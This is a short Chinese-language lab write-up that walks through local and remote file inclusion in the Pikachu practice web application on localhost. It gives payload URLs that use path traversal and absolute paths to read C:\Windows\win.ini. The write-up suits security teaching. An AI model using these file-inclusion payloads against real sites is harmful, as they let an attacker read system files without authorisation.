一、local
1.随意点开,发现返回的是不同的图片及说明。
2.从url看只是能够看出filename的不同导致返回的结果不同。
http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=file5.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
所以尝试输入另外的file(n=1-10)去看看会不会给我们返回点其他东西。输入http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=file6.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2,返回结果如下
3.输入7,返回报错,从报错中也能看出一点有用的东西。
4.结合报错信息中泄露的fi_local.php文件位置,可以算出相对路径为…/…/…/…/…/…/windows/win.ini,代入url中组成payload:
http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=…/…/…/…/…/…/windows/win.ini&submit=%E6%8F%90%E4%BA%A4
成功读取到C:\Windows\win.ini文件的内容:
二、remote
1.打开界面,发现提示错误
2.修改文件
3.随意点开几个,查看url与上次实验有何不同
4.尝试一下本地包含看看能不能用,访问一下本地文件读取C:\Windows\win.ini文件的内容:
http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=C:\Windows\win.ini&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2